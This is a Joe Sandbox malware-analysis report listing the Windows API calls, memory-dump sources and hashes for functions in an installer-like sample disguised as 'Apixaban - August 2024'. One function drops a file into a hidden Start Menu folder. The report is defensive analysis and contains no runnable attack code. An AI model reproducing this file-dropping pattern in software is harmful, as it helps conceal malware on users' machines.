                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                • String ID: 9
                                                • API String ID: 1149667376-2366072709
                                                • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                • String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                • API String ID: 1453599865-1516462631
                                                • Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                • Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                • GetTickCount.KERNEL32 ref: 00402D51
                                                • wsprintfW.USER32 ref: 00402D7F
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                  • Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C85E,00000064,00032621), ref: 00402D11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                • GetMessagePos.USER32 ref: 00404A7F
                                                • ScreenToClient.USER32(?,?), ref: 00404A99
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                • wsprintfW.USER32 ref: 00402CCF
                                                • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                • Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D44
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                • Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                • wsprintfW.USER32 ref: 00404A10
                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                • Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
                                                • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: : Completed
                                                • API String ID: 3677997916-2954849223
                                                • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00405939
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403510), ref: 00405943
                                                • lstrcatW.KERNEL32(?,00409014), ref: 00405955
